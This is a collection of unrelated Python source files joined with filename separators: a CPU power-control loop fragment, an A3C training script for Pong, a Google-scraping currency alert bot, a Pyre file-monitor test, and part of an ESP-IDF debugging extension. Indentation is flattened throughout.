print ' rpc %d' % ((s.ts_before_backlog - s.ts_first_pkt_at_target ) / shmem.cycles_per_us),
print ' backlog %d' % ((s.ts_after_backlog - s.ts_before_backlog ) / shmem.cycles_per_us),
print ' lastprv %d' % ((s.ts_last_pkt_at_prev - s.ts_data_structures_done ) / shmem.cycles_per_us),
print ' timer_fired %d' % s.timer_fired,
print
shmem.scratchpad[i].remote_queue_pkts = 0
shmem.scratchpad[i].local_queue_pkts = 0
shmem.scratchpad[i].backlog = 0
shmem.scratchpad[i].migration_duration = 0
printed_done = True
if curr_step_idx != new_step_idx and set_step_done:
if new_step_idx > curr_step_idx:
step = 'up'
last_up = now
dir = STEP_UP
else:
step = 'down'
last_down = now
dir = STEP_DOWN
curr_step_idx = new_step_idx
scratchpad_idx_prv = shmem.scratchpad_idx
set_step_done = False
printed_done = False
thread = threading.Thread(target=set_step, args=(shmem, fg_per_cpu, steps[curr_step_idx], dir, args))
thread.daemon = True
thread.start()
print '# %f control_action %s step=%d x=x freq=%d cpus=%r x=x' % (now, step,curr_step_idx,steps[curr_step_idx]['frequency'],steps[curr_step_idx]['cpus'])
time.sleep(.1)
elif args.print_power:
print shmem.pkg_power
if __name__ == '__main__':
main()
|
02_a3c_grad.py
|
#!/usr/bin/env python3
import os
import gym
import ptan
import argparse
from tensorboardX import SummaryWriter
import torch
import torch.nn.utils as nn_utils
import torch.nn.functional as F
import torch.optim as optim
import torch.multiprocessing as mp
from lib import common
GAMMA = 0.99
LEARNING_RATE = 0.001
ENTROPY_BETA = 0.01
REWARD_STEPS = 4
CLIP_GRAD = 0.1
PROCESSES_COUNT = 4
NUM_ENVS = 8
GRAD_BATCH = 64
TRAIN_BATCH = 2
if True:
ENV_NAME = "PongNoFrameskip-v4"
NAME = 'pong'
REWARD_BOUND = 18
else:
ENV_NAME = "BreakoutNoFrameskip-v4"
NAME = "breakout"
REWARD_BOUND = 400
TRAIN_BATCH = 4
def make_env():
return ptan.common.wrappers.wrap_dqn(gym.make(ENV_NAME))
def grads_func(proc_name, net, device, train_queue):
envs = [make_env() for _ in range(NUM_ENVS)]
agent = ptan.agent.PolicyAgent(
lambda x: net(x)[0], device=device, apply_softmax=True)
exp_source = ptan.experience.ExperienceSourceFirstLast(
envs, agent, gamma=GAMMA, steps_count=REWARD_STEPS)
batch = []
frame_idx = 0
writer = SummaryWriter(comment=proc_name)
with common.RewardTracker(writer, REWARD_BOUND) as tracker:
with ptan.common.utils.TBMeanTracker(
writer, 100) as tb_tracker:
for exp in exp_source:
frame_idx += 1
new_rewards = exp_source.pop_total_rewards()
if new_rewards and tracker.reward(
new_rewards[0], frame_idx):
break
batch.append(exp)
if len(batch) < GRAD_BATCH:
continue
data = common.unpack_batch(
batch, net, device=device,
last_val_gamma=GAMMA**REWARD_STEPS)
states_v, actions_t, vals_ref_v = data
batch.clear()
net.zero_grad()
logits_v, value_v = net(states_v)
loss_value_v = F.mse_loss(
value_v.squeeze(-1), vals_ref_v)
log_prob_v = F.log_softmax(logits_v, dim=1)
adv_v = vals_ref_v - value_v.detach()
log_p_a = log_prob_v[range(GRAD_BATCH), actions_t]
log_prob_actions_v = adv_v * log_p_a
loss_policy_v = -log_prob_actions_v.mean()
prob_v = F.softmax(logits_v, dim=1)
ent = (prob_v * log_prob_v).sum(dim=1).mean()
entropy_loss_v = ENTROPY_BETA * ent
loss_v = entropy_loss_v + loss_value_v + \
loss_policy_v
loss_v.backward()
tb_tracker.track("advantage", adv_v, frame_idx)
tb_tracker.track("values", value_v, frame_idx)
tb_tracker.track("batch_rewards", vals_ref_v,
frame_idx)
tb_tracker.track("loss_entropy", entropy_loss_v,
frame_idx)
tb_tracker.track("loss_policy", loss_policy_v,
frame_idx)
tb_tracker.track("loss_value", loss_value_v,
frame_idx)
tb_tracker.track("loss_total", loss_v, frame_idx)
# gather gradients
nn_utils.clip_grad_norm_(
net.parameters(), CLIP_GRAD)
grads = [
param.grad.data.cpu().numpy()
if param.grad is not None else None
for param in net.parameters()
]
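                    # ship CPU numpy copies of the gradients to the parent process; the network
                    # weights themselves are shared via net.share_memory() in the parent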
train_queue.put(grads)
train_queue.put(None)
if __name__ == "__main__":
mp.set_start_method('spawn')
os.environ['OMP_NUM_THREADS'] = "1"
parser = argparse.ArgumentParser()
parser.add_argument("--cuda", default=False,
action="store_true", help="Enable cuda")
parser.add_argument("-n", "--name", required=True,
help="Name of the run")
args = parser.parse_args()
device = "cuda" if args.cuda else "cpu"
env = make_env()
net = common.AtariA2C(env.observation_space.shape,
env.action_space.n).to(device)
net.share_memory()
optimizer = optim.Adam(net.parameters(),
lr=LEARNING_RATE, eps=1e-3)
train_queue = mp.Queue(maxsize=PROCESSES_COUNT)
data_proc_list = []
for proc_idx in range(PROCESSES_COUNT):
proc_name = f"-a3c-grad_pong_{args.name}#{proc_idx}"
p_args = (proc_name, net, device, train_queue)
data_proc = mp.Process(target=grads_func, args=p_args)
data_proc.start()
data_proc_list.append(data_proc)
batch = []
step_idx = 0
grad_buffer = None
try:
while True:
train_entry = train_queue.get()
if train_entry is None:
break
step_idx += 1
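            # sum gradient packets from the workers element-wise; the accumulated buffer is
            # applied to the shared network once TRAIN_BATCH packets have arrived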
if grad_buffer is None:
grad_buffer = train_entry
else:
for tgt_grad, grad in zip(grad_buffer,
train_entry):
tgt_grad += grad
if step_idx % TRAIN_BATCH == 0:
for param, grad in zip(net.parameters(),
grad_buffer):
param.grad = torch.FloatTensor(grad).to(device)
nn_utils.clip_grad_norm_(
net.parameters(), CLIP_GRAD)
optimizer.step()
grad_buffer = None
finally:
for p in data_proc_list:
p.terminate()
p.join()
|
rate_processing.py
|
import os
import re
import sqlite3
import time
import logging
import requests
import threading
from bs4 import BeautifulSoup
logging.basicConfig(level=logging.WARNING)
class RateProcessing:
"""
    Class initialization
"""
def __init__(self, upd_time: int):
self.currencies_ref_dict = {
'EUR': 'https://www.google.com/search?ei=ijQkX56kHcGEwPAPtPSa2AQ&q=%D0%BA%D1%83%D1%80%D1%81+%D0%B5%D0%B2'
'%D1%80%D0%BE+%D0%BA+%D1%80%D1%83%D0%B1%D0%BB%D1%8E&oq=%D0%BA%D1%83%D1%80%D1%81+%D0%B5%D0%B2%D1%80'
'%D0%BE+%D0%BA+%D1%80%D1%83%D0%B1%D0%BB%D1%8E&gs_lcp=CgZwc3ktYWIQAzINCAAQsQMQgwEQRhCCAjIICAAQsQMQ'
'gwEyCAgAELEDEIMBMgYIABAHEB4yCAgAELEDEIMBMgYIABAHEB4yAggAMgIIADIGCAAQBxAeMgIIADoHCAAQsAMQQzoICAAQ'
'BxAKEB46BAgAEA1QhbERWPvWEWCe3hFoA3AAeACAAVaIAboGkgECMTOYAQCgAQGqAQdnd3Mtd2l6wAEB&sclient=psy-ab'
'&ved=0ahUKEwiekdiV4_fqAhVBAhAIHTS6BksQ4dUDCAw&uact=5',
'USD': 'https://www.google.com/search?ei=fDQkX5esEsOxrgTI_ImADQ&q=%D0%BA%D1%83%D1%80%D1%81+%D0%B4%D0%BE%'
'D0%BB%D0%BB%D0%B0%D1%80%D0%B0+%D0%BA+%D1%80%D1%83%D0%B1%D0%BB%D1%8E&oq=%D0%BA%D1%83%D1%80%D1%81+'
'%D0%B4%D0%BE%D0%BB%D0%BB%D0%B0%D1%80%D0%B0+%D0%BA+%D1%80%D1%83%D0%B1%D0%BB%D1%8E&gs_lcp=CgZwc3k'
'tYWIQAzIPCAAQsQMQgwEQQxBGEIICMggIABCxAxCDATIICAAQsQMQgwEyBQgAELEDMgIIADICCAAyAggAMggIABCxAxCDATI'
'CCAAyAggAOgcIABCwAxBDOgoIABCxAxCDARBDOgQIABBDOgQIABAKOgkIABBDEEYQggI6BwgAELEDEENQsylYmWZglmhoBHAA'
'eACAAWOIAewJkgECMTmYAQCgAQGqAQdnd3Mtd2l6wAEB&sclient=psy-ab&ved=0ahUKEwiX2vaO4_fqAhXDmIsKHUh-AtA'
'Q4dUDCAw&uact=5',
'CHF': 'https://www.google.com/search?ei=rTUkX4bmMMTnrgTnpKLADg&q=%D0%BA%D1%83%D1%80%D1%81+%D1%88%D0%'
'B2%D0%B5%D0%B9%D1%86%D0%B0%D1%80%D1%81%D0%BA%D0%BE%D0%B3%D0%BE+%D1%84%D1%80%D0%B0%D0%BD%D0%BA%'
'D0%B0+%D0%BA+%D1%80%D1%83%D0%B1%D0%BB%D1%8E&oq=%D0%BA%D1%83%D1%80%D1%81+%D1%88%D0%B2%D0%B5%D0%'
'B9%D1%86%D0%B0&gs_lcp=CgZwc3ktYWIQARgBMg0IABCxAxCDARBGEIICMgIIADICCAAyAggAMgIIADICCAAyAggAMgII'
'ADICCAAyAggAOgcIABCwAxBDOggIABCxAxCDAToFCAAQsQM6CggAELEDEIMBEEM6BAgAEEM6DwgAELEDEIMBEEMQRhCCA'
'lCkngNYg9QDYMLmA2gDcAB4AIABUIgBwQWSAQIxMZgBAKABAaoBB2d3cy13aXqwAQDAAQE&sclient=psy-ab',
'BTC': 'https://www.google.com/search?ei=NcIqX8q4FIqwrgSz3K6ACg&q=bitcoin+to+rub&oq=bitcoin+to+&gs_lcp='
'CgZwc3ktYWIQARgBMg0IABCxAxCDARBGEIICMgIIADICCAAyAggAMgIIADICCAAyAggAMgIIADICCAAyAggAOggIABCxAxCD'
'AToFCAAQsQM6AgguOgUILhCxAzoJCAAQsQMQChABOgoIABCxAxCDARBDOgQIABBDOgcIABCxAxBDOgwIABCxAxBDEEYQggI6'
'CQgAEEMQRhCCAlCXLFiEggFguY8BaANwAHgAgAF9iAGgCJIBBDExLjKYAQCgAQGqAQdnd3Mtd2l6sAEAwAEB&sclient=psy-ab'
}
self.headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/83.0.4103.106 Safari/537.36'
}
self.upd_time = upd_time
self.users_to_send = {}
self.flag_upd_uts = False
def parse_html(self, key=None):
        # Parse the Google search results page for the requested currency key
full_page = requests.get(self.currencies_ref_dict[key], headers=self.headers)
soup = BeautifulSoup(full_page.content, 'html.parser')
convert = soup.find_all('span', {'class': 'DFlfde SwHCTb', 'data-precision': 2})
return str(convert[0])
def get_rate(self, key=None):
        # Extract the numeric rate from the parsed page and round it to two decimal places
found_rate = re.findall(r'\d{,9}[.]\d{,5}', self.parse_html(key))
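        # e.g. (hypothetical markup) parse_html() returns something like
        # '<span class="DFlfde SwHCTb" data-precision="2">73.42</span>',
        # from which the regex extracts ['73.42']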
return round(float(found_rate[0]), 2)
@staticmethod
def set_level(user_id, name, chat_id, key, level):
conn = sqlite3.connect("currencies_db.db")
cursor = conn.cursor()
cursor.execute('INSERT INTO currencies_levels VALUES (?, ?, ?, ?, ?)', (user_id, name, chat_id, key, level))
conn.commit()
def get_id_to_send(self, key):
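        # Collect (user_id, name, chat_id, curr_code, curr_value) alert rows whose saved level has
        # been reached (the freshly updated rate is at or below the level), remember them in
        # users_to_send, then delete them so each alert fires only once; the table is created lazily.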
conn = sqlite3.connect("currencies_db.db")
cursor = conn.cursor()
db_exists = int(cursor.execute("""SELECT COUNT(name)
FROM sqlite_master
WHERE type = 'table'
AND name = 'currencies_levels'""").fetchone()[0])
if not db_exists:
cursor.execute("""CREATE TABLE currencies_levels(user_id INTEGER(20),
name VAR_CHAR(20),
chat_id INTEGER(20),
curr_code VAR_CHAR(3),
curr_value DECIMAL(10, 2))""")
cursor.execute("""SELECT user_id, name, chat_id, curr_code,curr_value
FROM currencies_levels
WHERE curr_value >= (SELECT curr_value
FROM updated_currencies
WHERE curr_code = ?)
AND curr_code = ?""", (key, key))
self.users_to_send[key] = list(set([item for item in cursor.fetchall()]))
for item in self.users_to_send[key]:
cursor.execute("""DELETE FROM currencies_levels
WHERE user_id = ? AND curr_code = ? AND curr_value = ?""", (item[0], key, item[4]))
conn.commit()
def get_flw_cur(self, id):
conn = sqlite3.connect("currencies_db.db")
cursor = conn.cursor()
cursor.execute('SELECT * FROM currencies_levels WHERE user_id = ?', (id,))
return cursor.fetchall()
def thread(self):
conn = sqlite3.connect("currencies_db.db")
cursor = conn.cursor()
start_time = time.time() - self.upd_time
while True:
if (time.time() - start_time) < self.upd_time:
                time.sleep(1)  # sleep briefly instead of busy-waiting until the update interval elapses
                continue
else:
start_time = time.time()
db_exists = int(cursor.execute("""SELECT COUNT(name)
FROM sqlite_master
WHERE type = 'table'
AND name = 'updated_currencies'""").fetchone()[0])
if db_exists:
for key in self.currencies_ref_dict:
cursor.execute('UPDATE updated_currencies SET curr_value = ?, '
'time = ? WHERE curr_code = ?',
(self.get_rate(key), time.time(), key))
conn.commit()
else:
cursor.execute("""CREATE TABLE updated_currencies(curr_code VAR_CHAR(3),
curr_value DECIMAL(10, 2),
time INT(30)
)""")
for key in self.currencies_ref_dict.keys():
cursor.execute('INSERT INTO updated_currencies VALUES (?, ?, ?)',
(key, self.get_rate(key), time.time()))
conn.commit()
for key in self.currencies_ref_dict.keys():
self.get_id_to_send(key)
self.flag_upd_uts = True
            # logging.warning('Currency rates updated')
def execute(self):
threading.Thread(target=self.thread).start()
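

# Hypothetical usage sketch (assumes currencies_db.db and its tables already exist; the bot
# layer that consumes users_to_send is outside this module):
#     rp = RateProcessing(upd_time=300)           # re-scrape rates every 5 minutes
#     rp.execute()                                 # start the background update thread
#     rp.set_level(1, 'alice', 1, 'USD', 75.0)     # alert once USD/RUB drops to 75.0 or below
#     print(rp.get_flw_cur(1))                     # levels currently tracked for user 1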
|
project_files_monitor_test.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-unsafe
import os
import socket
import tempfile
import threading
import unittest
from unittest.mock import MagicMock, patch
from .. import json_rpc, project_files_monitor
from ..analysis_directory import UpdatedPaths
from ..json_rpc import Request, read_lsp_request
from ..project_files_monitor import MonitorException, ProjectFilesMonitor
from ..socket_connection import SocketConnection, SocketException
from ..tests.mocks import mock_configuration
class MonitorTest(unittest.TestCase):
@patch.object(SocketConnection, "connect")
@patch.object(json_rpc, "perform_handshake")
@patch.object(project_files_monitor, "find_parent_directory_containing_file")
def test_subscriptions(
self,
find_parent_directory_containing_file,
perform_handshake,
_socket_connection,
) -> None:
find_parent_directory_containing_file.return_value = "/ROOT"
configuration = mock_configuration()
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = "/ROOT"
# no additional extensions
configuration.extensions = []
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:2], ["allof", ["type", "f"]]
)
self.assertCountEqual(
subscription.subscription["expression"][2],
[
"anyof",
["suffix", "py"],
["suffix", "pyi"],
["suffix", "thrift"],
["match", "TARGETS"],
],
)
# additional extensions
configuration.get_valid_extension_suffixes = lambda: [".thrift", ".whl"]
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:2], ["allof", ["type", "f"]]
)
self.assertCountEqual(
subscription.subscription["expression"][2],
[
"anyof",
["suffix", "py"],
["suffix", "pyi"],
["suffix", "thrift"],
["suffix", "whl"],
["match", "TARGETS"],
],
)
# no watchman root -> terminate
find_parent_directory_containing_file.return_value = None
self.assertRaises(
MonitorException,
ProjectFilesMonitor,
configuration,
".",
analysis_directory,
)
def test_bad_socket(self) -> None:
with tempfile.TemporaryDirectory() as root:
bad_socket_path = os.path.join(root, "bad.sock")
socket_connection = SocketConnection(bad_socket_path)
self.assertRaises(SocketException, socket_connection.connect)
@patch.object(ProjectFilesMonitor, "_find_watchman_path")
def test_socket_communication(self, _find_watchman_path) -> None:
# Create a "server" thread to complete the handshake
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
errors = []
with tempfile.TemporaryDirectory() as root:
socket_path = os.path.join(root, ".pyre", "server", "json_server.sock")
os.makedirs(os.path.dirname(socket_path))
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
outfile = connection.makefile(mode="wb")
infile = connection.makefile(mode="rb")
request = Request(
method="handshake/server",
parameters=json_rpc.ByNameParameters({"version": "123"}),
)
json_rpc.write_lsp_request(outfile, request)
response = read_lsp_request(infile)
if response.method != "handshake/client":
errors.append("Client handshake malformed")
return
request = Request(method="handshake/socket_added")
json_rpc.write_lsp_request(outfile, request)
updated_message = read_lsp_request(infile)
if (
updated_message.method != "updateFiles"
or not updated_message.parameters
or updated_message.parameters.get("files")
!= ["/ANALYSIS/a.py", "/ANALYSIS/subdir/b.py"]
):
errors.append("Update message malformed")
server_thread = threading.Thread(target=server)
server_thread.start()
configuration = mock_configuration(version_hash="123")
configuration.log_directory = root + "/.pyre"
configuration.extensions = []
analysis_directory = MagicMock()
analysis_directory.process_updated_files.side_effect = (
lambda files: UpdatedPaths(
updated_paths=[file.replace("ROOT", "ANALYSIS") for file in files],
deleted_paths=[],
)
)
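            # the mock translates watched paths under /ROOT to /ANALYSIS, which is what the
            # fake server expects to see in the "updateFiles" message above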
# only create the monitor once the socket is open
with socket_created_lock:
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
monitor._handle_response(
{"root": "/ROOT", "files": ["a.py", "subdir/b.py"]}
)
analysis_directory.process_updated_files.assert_called_once_with(
["/ROOT/a.py", "/ROOT/subdir/b.py"]
)
server_thread.join()
self.assertEqual(errors, [])
@patch.object(os.path, "realpath")
def test_socket_connection(self, realpath) -> None:
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
with tempfile.TemporaryDirectory() as root:
realpath.side_effect = lambda path: path.replace(
os.path.dirname(path), root # replace parent directories with tempdir
)
# Unix sockets have a limited length of ~100 characters, so the server uses
# symbolic links as a workaround. We need to properly translate these.
socket_link = os.path.join(
".pyre", "long_name" * 15, "server", "json_server.sock"
)
socket_path = os.path.join(root, "json_server.sock")
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
server_thread = threading.Thread(target=server)
server_thread.start()
with socket_created_lock:
SocketConnection(socket_link).connect()
server_thread.join()
|
debug_ext.py
|
import json
import os
import re
import shlex
import subprocess
import sys
import threading
import time
from threading import Thread
from typing import Any, Dict, List
from idf_py_actions.errors import FatalError
from idf_py_actions.tools import ensure_build_directory
PYTHON = sys.executable
def action_extensions(base_actions, project_path):
OPENOCD_OUT_FILE = 'openocd_out.txt'
GDBGUI_OUT_FILE = 'gdbgui_out.txt'
# Internal dictionary of currently active processes, threads and their output files
processes = {'threads_to_join': [], 'openocd_issues': None}
def _check_for_common_openocd_issues(file_name, print_all=True):
if processes['openocd_issues'] is not None:
return processes['openocd_issues']
try:
message = 'Please check JTAG connection!'
with open(file_name, 'r') as f:
content = f.read()
if print_all:
print(content)
if re.search(r'Address already in use', content):
message = ('Please check if another process uses the mentioned ports. OpenOCD already running, perhaps in the background?\n'
'Please list all processes to check if OpenOCD is already running; if so, terminate it before starting OpenOCD from idf.py')
finally:
processes['openocd_issues'] = message
return message
def _check_openocd_errors(fail_if_openocd_failed, target, ctx):
if fail_if_openocd_failed:
if 'openocd' in processes and processes['openocd'] is not None:
p = processes['openocd']
name = processes['openocd_outfile_name']
                # watch OpenOCD for up to 5 x 500 ms to check whether it has terminated or printed an error
for _ in range(5):
if p.poll() is not None:
print('OpenOCD exited with {}'.format(p.poll()))
break
with open(name, 'r') as f:
content = f.read()
if re.search(r'no device found', content):
break
if re.search(r'Listening on port \d+ for gdb connections', content):
# expect OpenOCD has started successfully - stop watching
return
time.sleep(0.5)
else:
return
# OpenOCD exited or error message detected -> print possible output and terminate
raise FatalError('Action "{}" failed due to errors in OpenOCD:\n{}'.format(target, _check_for_common_openocd_issues(name)), ctx)
def _terminate_async_target(target):
if target in processes and processes[target] is not None:
try:
if target + '_outfile' in processes:
processes[target + '_outfile'].close()
p = processes[target]
if p.poll() is None:
p.terminate()
# waiting 10x100ms for the process to terminate gracefully
for _ in range(10):
if p.poll() is not None:
break
time.sleep(0.1)
else:
p.kill()
if target + '_outfile_name' in processes:
if target == 'openocd':
print(_check_for_common_openocd_issues(processes[target + '_outfile_name'], print_all=False))
os.unlink(processes[target + '_outfile_name'])
except Exception as e:
print(e)
print('Failed to close/kill {}'.format(target))
processes[target] = None # to indicate this has ended
def create_local_gdbinit(gdbinit, elf_file):
with open(gdbinit, 'w') as f:
if os.name == 'nt':
elf_file = elf_file.replace('\\','\\\\')
f.write('file {}\n'.format(elf_file))
f.write('target remote :3333\n')
f.write('mon reset halt\n')
f.write('flushregs\n')
f.write('thb app_main\n')
f.write('c\n')
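    # For illustration (the ELF path is hypothetical), the generated gdbinit would contain:
    #   file build/my_app.elf
    #   target remote :3333
    #   mon reset halt
    #   flushregs
    #   thb app_main
    #   c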
def debug_cleanup():
print('cleaning up debug targets')
for t in processes['threads_to_join']:
if threading.currentThread() != t:
t.join()
_terminate_async_target('openocd')
_terminate_async_target('gdbgui')
_terminate_async_target('gdb')
def post_debug(action, ctx, args, **kwargs):
""" Deal with asynchronous targets, such as openocd running in background """
if kwargs['block'] == 1:
for target in ['openocd', 'gdbgui']:
if target in processes and processes[target] is not None:
break
else:
return
try:
p = processes[target]
name = processes[target + '_outfile_name']
pos = 0
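                # tail the target's output file: reopen it on each pass, seek past what was
                # already printed, echo any new lines, and stop once the process exits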
while True:
with open(name, 'r') as f:
f.seek(pos)
for line in f:
print(line.rstrip())
pos = f.tell()
if p.poll() is not None:
print('"{}" exited with {}'.format(target, p.poll()))
break
time.sleep(0.5)
except KeyboardInterrupt:
print('Terminated -> exiting debug utility targets')
_terminate_async_target('openocd')
_terminate_async_target('gdbgui')
def get_project_desc(args, ctx):
desc_path = os.path.join(args.build_dir, 'project_description.json')
if not os.path.exists(desc_path):
ensure_build_directory(args, ctx.info_name)
with open(desc_path, 'r') as f:
project_desc = json.load(f)
return project_desc
def openocd(action, ctx, args, openocd_scripts, openocd_commands):
"""
Execute openocd as external tool
"""
        OPENOCD_TARGET_CONFIG = {
'esp32': '-f board/esp32-wrover-kit-3.3v.cfg',
'esp32s2': '-f board/esp32s2-kaluga-1.cfg',
}
if os.getenv('OPENOCD_SCRIPTS') is None:
raise FatalError('OPENOCD_SCRIPTS not found in the environment: Please run export.sh/export.bat', ctx)
openocd_arguments = os.getenv('OPENOCD_COMMANDS') if openocd_commands is None else openocd_commands
project_desc = get_project_desc(args, ctx)
if openocd_arguments is None:
# use default value if commands not defined in the environment nor command line
target = project_desc['target']
default_args = '-f interface/ftdi/esp32_devkitj_v1.cfg -f target/{}.cfg'.format(target)
            openocd_arguments = OPENOCD_TARGET_CONFIG.get(target, default_args)
            print('Note: OpenOCD cfg not found (neither via the OPENOCD_COMMANDS environment variable nor via the --openocd-commands argument)\n'
                  'OpenOCD arguments default to: "{}"'.format(openocd_arguments))
# script directory is taken from the environment by OpenOCD, update only if command line arguments to override
if openocd_scripts is not None:
openocd_arguments += ' -s {}'.format(openocd_scripts)
local_dir = project_desc['build_dir']
args = ['openocd'] + shlex.split(openocd_arguments)
openocd_out_name = os.path.join(local_dir, OPENOCD_OUT_FILE)
openocd_out = open(openocd_out_name, 'a+')
try:
process = subprocess.Popen(args, stdout=openocd_out, stderr=subprocess.STDOUT, bufsize=1)
except Exception as e:
print(e)
raise FatalError('Error starting openocd. Please make sure it is installed and is present in executable paths', ctx)
processes['openocd'] = process
processes['openocd_outfile'] = openocd_out
processes['openocd_outfile_name'] = openocd_out_name
print('OpenOCD started as a background task {}'.format(process.pid))
def get_gdb_args(gdbinit, project_desc: Dict[str, Any]) -> List[str]:
args = ['-x={}'.format(gdbinit)]
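        # resulting args look like ['-x=<gdbinit>'] plus, when the project description provides
        # a debug prefix-map gdbinit, an additional '-ix=<debug_prefix_map_gdbinit>' entry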
debug_prefix_gdbinit = project_desc.get('debug_prefix_map_gdbinit')
if debug_prefix_gdbinit:
args.append('-ix={}'.format(debug_prefix_gdbinit))
return args
def gdbui(action, ctx, args, gdbgui_port, gdbinit, require_openocd):
"""
Asynchronous GDB-UI target
"""
project_desc = get_project_desc(args, ctx)
local_dir = project_desc['build_dir']
gdb = project_desc['monitor_toolprefix'] + 'gdb'
if gdbinit is None:
gdbinit = os.path.join(local_dir, 'gdbinit')
create_local_gdbinit(gdbinit, os.path.join(args.build_dir, project_desc['app_elf']))
# this is a workaround for gdbgui
# gdbgui is using shlex.split for the --gdb-args option. When the input is:
# - '"-x=foo -x=bar"', would return ['foo bar']
# - '-x=foo', would return ['-x', 'foo'] and mess up the former option '--gdb-args'
        # so for a single item, add extra double quotes; for multiple items, no extra quotes are needed.
gdb_args = get_gdb_args(gdbinit, project_desc)
gdb_args = '"{}"'.format(' '.join(gdb_args)) if len(gdb_args) == 1 else ' '.join(gdb_args)
args = ['gdbgui', '-g', gdb, '--gdb-args', gdb_args]
print(args)
if gdbgui_port is not None:
args += ['--port', gdbgui_port]
gdbgui_out_name = os.path.join(local_dir, GDBGUI_OUT_FILE)
gdbgui_out = open(gdbgui_out_name, 'a+')
env = os.environ.copy()
# The only known solution for https://github.com/cs01/gdbgui/issues/359 is to set the following environment
# variable. The greenlet package cannot be downgraded for compatibility with other requirements (gdbgui,
# pygdbmi).
env['PURE_PYTHON'] = '1'
try:
process = subprocess.Popen(args, stdout=gdbgui_out, stderr=subprocess.STDOUT, bufsize=1, env=env)
except Exception as e:
print(e)
raise FatalError('Error starting gdbgui. Please make sure gdbgui has been installed with '
'"install.{sh,bat,ps1,fish} --enable-gdbgui" and can be started.', ctx)
processes['gdbgui'] = process
processes['gdbgui_outfile'] = gdbgui_out
processes['gdbgui_outfile_name'] = gdbgui_out_name
print('gdbgui started as a background task {}'.format(process.pid))
_check_openocd_errors(fail_if_openocd_failed, action, ctx)
def global_callback(ctx, global_args, tasks):
def move_to_front(task_name):
for index, task in enumerate(tasks):
if task.name == task_name:
tasks.insert(0, tasks.pop(index))
break
debug_targets = any([task.name in ('openocd', 'gdbgui') for task in tasks])
if debug_targets:
# Register the meta cleanup callback -> called on FatalError
ctx.meta['cleanup'] = debug_cleanup
move_to_front('gdbgui') # possibly 2nd
move_to_front('openocd') # always 1st
# followed by "monitor", "gdb" or "gdbtui" in any order
post_action = ctx.invoke(ctx.command.get_command(ctx, 'post_debug'))
if any([task.name in ('monitor', 'gdb', 'gdbtui') for task in tasks]):
post_action.action_args['block'] = 0
else:
post_action.action_args['block'] = 1
tasks.append(post_action) # always last
if any([task.name == 'openocd' for task in tasks]):
for task in tasks:
if task.name in ('gdb', 'gdbgui', 'gdbtui'):
task.action_args['require_openocd'] = True
def run_gdb(gdb_args):
p = subprocess.Popen(gdb_args)
processes['gdb'] = p
return p.wait()
def gdbtui(action, ctx, args, gdbinit, require_openocd):
"""
Synchronous GDB target with text ui mode
"""
gdb(action, ctx, args, 1, gdbinit, require_openocd)
def gdb(action, ctx, args, gdb_tui, gdbinit, require_openocd):
"""
Synchronous GDB target
"""
watch_openocd = Thread(target=_check_openocd_errors, args=(fail_if_openocd_failed, action, ctx, ))
watch_openocd.start()
processes['threads_to_join'].append(watch_openocd)
desc_path = os.path.join(args.build_dir, 'project_description.json')
if not os.path.exists(desc_path):
ensure_build_directory(args, ctx.info_name)
with open(desc_path, 'r') as f:
project_desc = json.load(f)
elf_file = os.path.join(args.build_dir, project_desc['app_elf'])
if not os.path.exists(elf_file):
raise FatalError('ELF file not found. You need to build & flash the project before running debug targets', ctx)
gdb = project_desc['monitor_toolprefix'] + 'gdb'
local_dir = project_desc['build_dir']
if gdbinit is None:
gdbinit = os.path.join(local_dir, 'gdbinit')
create_local_gdbinit(gdbinit, elf_file)
args = [gdb, *get_gdb_args(gdbinit, project_desc)]
if gdb_tui is not None:
args += ['-tui']
t = Thread(target=run_gdb, args=(args,))
t.start()
while True:
try:
t.join()
break
except KeyboardInterrupt:
# Catching Keyboard interrupt, as this is used for breaking running program in gdb
continue
finally:
watch_openocd.join()
try:
processes['threads_to_join'].remove(watch_openocd)
except ValueError:
# Valid scenario: watch_openocd task won't be in the list if openocd not started from idf.py
pass
fail_if_openocd_failed = {
'names': ['--require-openocd', '--require_openocd'],
'help':
            ('Fail this target if openocd (this target\'s dependency) failed.\n'),
'is_flag': True,
'default': False,
}
gdbinit = {
'names': ['--gdbinit'],
        'help': ('Specify the name of the gdbinit file to use\n'),
'default': None,
}
debug_actions = {
'global_action_callbacks': [global_callback],
'actions': {
'openocd': {
'callback': openocd,
'help': 'Run openocd from current path',
'options': [
{
'names': ['--openocd-scripts', '--openocd_scripts'],
'help':
('Script directory for openocd cfg files.\n'),
'default':
None,
},
{
'names': ['--openocd-commands', '--openocd_commands'],
'help':
('Command line arguments for openocd.\n'),
'default': None,
}
],
'order_dependencies': ['all', 'flash'],
},
'gdb': {
'callback': gdb,
'help': 'Run the GDB.',
'options': [
{
'names': ['--gdb-tui', '--gdb_tui'],
'help':
('run gdb in TUI mode\n'),
'default':
None,
}, gdbinit, fail_if_openocd_failed
],
'order_dependencies': ['all', 'flash'],
},
'gdbgui': {
'callback': gdbui,
'help': 'GDB UI in default browser.',
'options': [
{
'names': ['--gdbgui-port', '--gdbgui_port'],
